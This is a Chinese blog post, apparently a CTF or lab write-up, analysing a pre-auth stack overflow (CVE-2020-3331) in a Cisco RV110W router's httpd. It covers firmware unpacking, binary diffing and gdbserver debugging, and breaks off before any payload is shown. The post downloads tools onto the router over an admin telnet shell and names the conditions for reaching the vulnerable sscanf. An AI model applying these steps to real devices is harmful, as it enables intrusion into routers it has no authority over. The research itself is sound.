<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
  </script>

  <meta name="description" content="照着学长的指导复现的第一个IOT设备">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞复现--思科路由器RV110W">
<meta property="og:url" content="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/index.html">
<meta property="og:site_name" content="Hyacinthum">
<meta property="og:description" content="照着学长的指导复现的第一个IOT设备">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201130223158149.png">
<meta property="og:image" content="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201130223337112.png">
<meta property="og:image" content="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201202090906028.png">
<meta property="og:image" content="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201202091919843.png">
<meta property="article:published_time" content="2020-11-28T06:47:28.000Z">
<meta property="article:modified_time" content="2021-10-11T04:55:14.110Z">
<meta property="article:author" content="Hyacinthum">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201130223158149.png">

<link rel="canonical" href="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>漏洞复现--思科路由器RV110W | Hyacinthum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Hyacinthum" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hyacinthum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">昼短苦夜长，何不秉烛游</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Hyacinthum">
      <meta itemprop="description" content="昼短苦夜长，何不秉烛游">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hyacinthum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          漏洞复现--思科路由器RV110W
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-11-28 14:47:28" itemprop="dateCreated datePublished" datetime="2020-11-28T14:47:28+08:00">2020-11-28</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-10-11 12:55:14" itemprop="dateModified" datetime="2021-10-11T12:55:14+08:00">2021-10-11</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>照着学长的指导复现的第一个IOT设备</strong></p>
<a id="more"></a>

<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>使用<code>nmap</code>扫描其常用端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~$ nmap 192.168.1.1</span><br><span class="line">Starting Nmap 7.01 ( https://nmap.org ) at 2020-11-30 05:10 PST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.1.1</span><br><span class="line">Host is up (0.0065s latency).</span><br><span class="line">Not shown: 994 filtered ports</span><br><span class="line">PORT    STATE SERVICE</span><br><span class="line">23/tcp  open  telnet</span><br><span class="line">25/tcp  open  smtp</span><br><span class="line">80/tcp  open  http</span><br><span class="line">110/tcp open  pop3</span><br><span class="line">443/tcp open  https</span><br><span class="line">444/tcp open  snpp</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 22.88 seconds</span><br></pre></td></tr></table></figure>

<p>发现在23端口为telnet，80端口为http，然后用<code>curl -v</code>输出与80端口通信的过程，发现其被重定位到了https即443端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~$ curl -v http://192.168.1.1</span><br><span class="line">* Rebuilt URL to: http://192.168.1.1/</span><br><span class="line">*   Trying 192.168.1.1...</span><br><span class="line">* Connected to 192.168.1.1 (192.168.1.1) port 80 (<span class="comment">#0)</span></span><br><span class="line">&gt; GET / HTTP/1.1</span><br><span class="line">&gt; Host: 192.168.1.1</span><br><span class="line">&gt; User-Agent: curl/7.47.0</span><br><span class="line">&gt; Accept: */*</span><br><span class="line">&gt; </span><br><span class="line">&lt; HTTP/1.1 302 Redirect</span><br><span class="line">&lt; Server: httpd</span><br><span class="line">&lt; Date: Fri, 01 Jan 2010 15:17:12 GMT</span><br><span class="line">&lt; Location: https://192.168.1.1</span><br><span class="line">&lt; Content-Type: text/plain</span><br><span class="line">&lt; Connection: close</span><br><span class="line">&lt; </span><br><span class="line">* Closing connection 0</span><br></pre></td></tr></table></figure>

<h3 id="固件提取与解包"><a href="#固件提取与解包" class="headerlink" title="固件提取与解包"></a>固件提取与解包</h3><p>赛题已经给出了特定版本的固件，无需特别进行提取操作，但还需要进行固件解包以得到设备的程序文件，在解包前，需要配置必须的环境</p>
<p>首先安装binwalk，binwalk可对设备固件进行文件格式的分析</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install binwalk</span><br></pre></td></tr></table></figure>

<p>对于目标固件，还需要安装<code>sasquatch</code>这一组件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install zlib1g-dev liblzma-dev liblzo2-dev</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/devttys0/sasquatch</span><br><span class="line"><span class="built_in">cd</span> sasquatch </span><br><span class="line">./build.sh</span><br></pre></td></tr></table></figure>

<p>此时使用binwalk还是会错误，还需要进行一些操作</p>
<ul>
<li>进入squashfs-tools文件夹,位于下载的sasquatch文件夹内，很容易找到</li>
<li>编辑Makefile文件，注释掉XZ_SUPPORT = 1行</li>
<li>执行<code>sudo make &amp;&amp; sudo make instal</code></li>
</ul>
<p>此后再执行以下命令即可解压出完整文件系统</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">binwalk -Me RV110W_FW_1.2.2.5.bin</span><br></pre></td></tr></table></figure>

<p>如下图所示</p>
<img src="/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201130223158149.png" alt="image-20201130223158149" style="zoom:50%;">

<img src="/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201130223337112.png" alt="image-20201130223337112" style="zoom:50%;">


<p>查看文件，确认目标平台为：MIPS 32位 小端</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file sbin/rc</span><br><span class="line">sbin/rc: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br></pre></td></tr></table></figure>

<h3 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h3><p>可以尝试在网上搜索关于该设备的漏洞，最基本的方法是在CVE官网上搜索设备相关信息，找到部分前台漏洞如下：</p>
<table>
<thead>
<tr>
<th>CVE编号</th>
<th>漏洞详情</th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3331">CVE-2020-3331</a></td>
<td>由于基于Web的管理界面未正确验证用户提供的输入数据而引起的前台RCE</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3330">CVE-2020-3330</a></td>
<td>Telnet服务漏洞，可获取系统账户具有的默认静态密码</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3323">CVE-2020-3323</a></td>
<td>同为前台RCE</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3150">CVE-2020-3150</a></td>
<td>要求有经过认证的用户登录过的文件下载</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3144">CVE-2020-3144</a></td>
<td>绕过前台认证，到后台执行命令</td>
</tr>
</tbody></table>
<h4 id="CVE-2020-3330"><a href="#CVE-2020-3330" class="headerlink" title="CVE-2020-3330"></a>CVE-2020-3330</h4><p>该漏洞为telnet服务的漏洞，可以在固件内找到管理员用户以及对应的密码hash值，<a target="_blank" rel="noopener" href="https://blogs.360.cn/post/yi-ge-zi-jie-cha-cuo-dao-zhi-Cisco-fang-huo-qiang-lu-you-qi-yuan-cheng-dai-ma-zhi-xing.html">一篇分析该漏洞的文章</a></p>
<h3 id="攻击目标"><a href="#攻击目标" class="headerlink" title="攻击目标"></a>攻击目标</h3><p>确定目标为CVE-2020-3331和CVE-2020-3323，因为都是Web前台RCE，且目标只开放了443端口(80端口被重定向)，所以要先找到Web对应的二进制程序</p>
<h4 id="固件搜索"><a href="#固件搜索" class="headerlink" title="固件搜索"></a>固件搜索</h4><p>全局搜索登陆界面名称<code>login.cgi</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~$ grep -Rn <span class="string">&quot;login.cgi&quot;</span> * 2&gt;/dev/null</span><br><span class="line">匹配到二进制文件 iot/rv110w/_RV110W_FW_1.2.2.5.bin.extracted/squashfs-root/usr/sbin/httpd</span><br><span class="line">iot/rv110w/_RV110W_FW_1.2.2.5.bin.extracted/squashfs-root/www/login.asp:453:&lt;FORM id=frm name=login method=&lt;% get_http_method(); %&gt; action=<span class="string">&quot;login.cgi&quot;</span> onKeyDown=chk_keypress(event) autocomplete=off&gt;</span><br></pre></td></tr></table></figure>

<p>可以看到二进制文件<code>usr/sbin/httpd</code>应该是Web程序</p>
<h4 id="端口分析"><a href="#端口分析" class="headerlink" title="端口分析"></a>端口分析</h4><p>设备自带的netstat无法查看端口对应的进程号，所以下载busybox，上传到路由器内（注意在实机调试中实际上不能直接使用这一方法，因为上传文件首先需要admin用户，这里是通过另一个漏洞获取的，所以可以直接用telnet上传文件，通常需要实机拆解调试，这里为方便处理使用了这种方法）</p>
<p>在本机开启web服务，在虚拟机开启的话操作会更麻烦，这里是在windows环境下开启的，注意将下载好的busybox放到某文件夹内后需在同一目录开启</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">D:\ctf\Iot\rw110w&gt;python -m SimpleHTTPServer</span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 ...</span><br></pre></td></tr></table></figure>

<p>用telnet管理员用户登陆路由器，在<code>/tmp</code>目录内用wget下载</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~$ telnet 192.168.1.1</span><br><span class="line">Trying 192.168.1.1...</span><br><span class="line">Connected to 192.168.1.1.</span><br><span class="line">Escape character is <span class="string">&#x27;^]&#x27;</span>.</span><br><span class="line">RV110W login: admin</span><br><span class="line">Password: </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">BusyBox v1.7.2 (2019-04-22 16:08:01 CST) built-in shell (ash)</span><br><span class="line">Enter <span class="string">&#x27;help&#x27;</span> <span class="keyword">for</span> a list of built-in commands.</span><br><span class="line">$ <span class="built_in">cd</span> /tmp</span><br><span class="line">$ wget http://192.168.1.100:8000/busybox-mipsel</span><br><span class="line">Connecting to 192.168.1.100:8000 (192.168.1.100:8000)</span><br><span class="line">busybox-mipsel       100% |*******************************|  1539k 00:00:00 ETA</span><br></pre></td></tr></table></figure>

<p>注意下载好后的文件可能没有执行权限，用<code>chmod</code>授予，用该</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># chmod +x busybox-mipsel</span></span><br><span class="line"><span class="comment"># ./busybox-mipsel netstat -pantu | grep 443</span></span><br><span class="line">tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      356/httpd</span><br><span class="line">tcp        0      0 :::443                  :::*                    LISTEN      356/httpd</span><br></pre></td></tr></table></figure>

<p>可以看到进程号对应httpd。</p>
<p>此后的调试还需要上传gdbserver，方法相同</p>
<h4 id="目标分析"><a href="#目标分析" class="headerlink" title="目标分析"></a>目标分析</h4><p>查看文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~/iot/rv110w/_RV110W_FW_1.2.2.5.bin.extracted/squashfs-root/usr/sbin$ file httpd</span><br><span class="line">httpd: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br><span class="line">ssr@ubuntu:~/iot/rv110w/_RV110W_FW_1.2.2.5.bin.extracted/squashfs-root/usr/sbin$ checksec httpd</span><br><span class="line">    Arch:     mips-32-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br><span class="line">    RWX:      Has RWX segments</span><br></pre></td></tr></table></figure>

<p>可以看到基本没开保护</p>
<p>但是直接反汇编分析还是比较复杂，因为新版本固件修复了以上漏洞，不妨对比查看</p>
<h5 id="固件对比"><a href="#固件对比" class="headerlink" title="固件对比"></a>固件对比</h5><p>下载新版1.2.2.8固件，同样用binwalk解包，对比httpd程序，这里就要使用IDA的bindiff插件，注意官网下载需要科学上网，安装时要指定IDA目录，我安装时初次是用4.30版本，不适用于7.x版本的ida，用5版本的bindiff即可。</p>
<p>在IDA的File菜单中可使用这一工具，在保存了两个文件的idb情况下，打开一个文件后用该工具选中另一个文件的idb，即可对比查看，可以在Matched Functions界面看到如下图所示</p>
<p><img src="/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201202090906028.png" alt="image-20201202090906028"></p>
<p>颜色越红的函数越不匹配。考虑到目标是获取前台的get_shell，所以guest_logout_cgi比较可疑，右键该函数选择<code>View flow graphs</code>功能即可进入bindiff对比查看</p>
<p>可以看到一个危险函数<code>sscanf</code></p>
<p><img src="/2020/11/28/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-%E6%80%9D%E7%A7%91%E8%B7%AF%E7%94%B1%E5%99%A8RV110W/image-20201202091919843.png" alt="image-20201202091919843"></p>
<p>测试访问guest_logout.cgi，发现是可以访问的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~$ curl -k -v https://192.168.1.1/guest_logout.cgi</span><br><span class="line">*   Trying 192.168.1.1...</span><br><span class="line">* Connected to 192.168.1.1 (192.168.1.1) port 443 (<span class="comment">#0)</span></span><br><span class="line">* found 138 certificates <span class="keyword">in</span> /etc/ssl/certs/ca-certificates.crt</span><br><span class="line">* found 557 certificates <span class="keyword">in</span> /etc/ssl/certs</span><br><span class="line">* ALPN, offering http/1.1</span><br><span class="line">* SSL connection using TLS1.2 / RSA_AES_128_GCM_SHA256</span><br><span class="line">* 	 server certificate verification SKIPPED</span><br><span class="line">* 	 server certificate status verification SKIPPED</span><br><span class="line">* 	 common name: BC:67:1C:41:F8:06 (does not match <span class="string">&#x27;192.168.1.1&#x27;</span>)</span><br><span class="line">* 	 server certificate expiration date OK</span><br><span class="line">* 	 server certificate activation date OK</span><br><span class="line">* 	 certificate public key: RSA</span><br><span class="line">* 	 certificate version: <span class="comment">#3</span></span><br><span class="line">* 	 subject: O=Cisco Systems\, Inc.,OU=Cisco,CN=BC:67:1C:41:F8:06,serialNumber=PID:RV110W-E SN:CCQ20311409</span><br><span class="line">* 	 start date: Thu, 09 Oct 2014 09:15:25 GMT</span><br><span class="line">* 	 expire date: Sun, 06 Oct 2024 09:15:25 GMT</span><br><span class="line">* 	 issuer: O=Cisco Systems\, Inc.,OU=Cisco,CN=BC:67:1C:41:F8:06,serialNumber=PID:RV110W-E SN:CCQ20311409</span><br><span class="line">* 	 compression: NULL</span><br><span class="line">* ALPN, server did not agree to a protocol</span><br><span class="line">&gt; GET /guest_logout.cgi HTTP/1.1</span><br><span class="line">&gt; Host: 192.168.1.1</span><br><span class="line">&gt; User-Agent: curl/7.47.0</span><br><span class="line">&gt; Accept: */*</span><br><span class="line">&gt; </span><br><span class="line">&lt; HTTP/1.1 200 Ok</span><br><span class="line">&lt; Server: httpd</span><br><span class="line">&lt; Date: Fri, 01 Jan 2010 03:20:09 GMT</span><br><span class="line">&lt; Cache-Control: no-cache</span><br><span class="line">&lt; Pragma: no-cache</span><br><span class="line">&lt; Expires: 0</span><br><span class="line">&lt; Content-Type: text/html</span><br><span class="line">&lt; Connection: close</span><br><span class="line">&lt; </span><br><span class="line">* Closing connection 0</span><br></pre></td></tr></table></figure>

<p>用IDA查看1.2.2.5版本固件的guest_logout_cgi伪码，找到sscanf函数部分如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">v5 = (<span class="keyword">const</span> <span class="keyword">char</span> *)get_cgi((<span class="keyword">char</span> *)&amp;unk_480000 + <span class="number">0x19B0</span>);</span><br><span class="line">v10 = (<span class="keyword">const</span> <span class="keyword">char</span> *)get_cgi(<span class="string">&quot;cip&quot;</span>);</span><br><span class="line">v11 = (<span class="keyword">const</span> <span class="keyword">char</span> *)get_cgi(<span class="string">&quot;submit_button&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> ( !v11 )</span><br><span class="line">  v11 = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> ( v5 &amp;&amp; v10 )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( VERIFY_MAC_17(v5) &amp;&amp; VERIFY_IPv4(v10) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !<span class="built_in">strstr</span>(v11, <span class="string">&quot;status_guestnet.asp&quot;</span>) )</span><br><span class="line">      <span class="keyword">goto</span> LABEL_31;</span><br><span class="line">    <span class="built_in">sscanf</span>(v11, <span class="string">&quot;%[^;];%*[^=]=%[^\n]&quot;</span>, v29, v28);</span><br></pre></td></tr></table></figure>

<p>sscanf为栈溢出，<code>%[^;];%*[^=]=%[^\n]</code>中，%表示选择，%*表示过滤，三个中括号表示类似正则的字符集，意思分别为：</p>
<ul>
<li><code>%[^;]</code>：分号前所有的字符</li>
<li><code>;%*[^=]</code>：分号后，等号前的字符都不要</li>
<li><code>=%[^\n]</code>：等号后，换行符前的所有字符</li>
</ul>
<p>v5未被正确识别，找到<code>0x004819B0</code>处，为<code>.rodata:004819B0 aCmac:  .ascii &quot;cmac&quot;&lt;0&gt;</code></p>
<p>分析到达sscanf所需的条件：</p>
<ul>
<li>cmac：mac地址格式</li>
<li>cip：ip地址格式</li>
<li>submit_button：包含status_guestnet.asp</li>
</ul>
<h4 id="用requests发包测试该程序"><a href="#用requests发包测试该程序" class="headerlink" title="用requests发包测试该程序"></a>用requests发包测试该程序</h4><h4 id="调试程序"><a href="#调试程序" class="headerlink" title="调试程序"></a>调试程序</h4><p>下载对应版本的gdbserver，用之前的方法上传到路由器，挂载到httpd对应的356进程上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line">wget http://192.168.1.100:8000/gdbserver</span><br><span class="line">./gdbserver :1234 --attach 356</span><br><span class="line">Attached; pid = 356</span><br><span class="line">Listening on port 1234</span><br></pre></td></tr></table></figure>

<p>然后启用<code>gdb-multiarch</code>开始远程调试</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~/iot/rv110w/_RV110W_FW_1.2.2.5.bin.extracted/squashfs-root/usr/sbin$ gdb-multiarch -q httpd</span><br><span class="line">pwndbg: loaded 190 commands. Type pwndbg [filter] <span class="keyword">for</span> a list.</span><br><span class="line">pwndbg: created <span class="variable">$rebase</span>, <span class="variable">$ida</span> gdb <span class="built_in">functions</span> (can be used with <span class="built_in">print</span>/<span class="built_in">break</span>)</span><br><span class="line">Reading symbols from httpd...(no debugging symbols found)...<span class="keyword">done</span>.</span><br><span class="line">gdb-peda$ <span class="built_in">set</span> architecture mips</span><br><span class="line">The target architecture is assumed to be mips</span><br><span class="line">gdb-peda$ <span class="built_in">set</span> endian little</span><br><span class="line">The target is assumed to be little endian</span><br><span class="line">gdb-peda$ target remote 192.168.1.1:1234</span><br></pre></td></tr></table></figure>

<p>然后发送之前测试用的报文：</p>
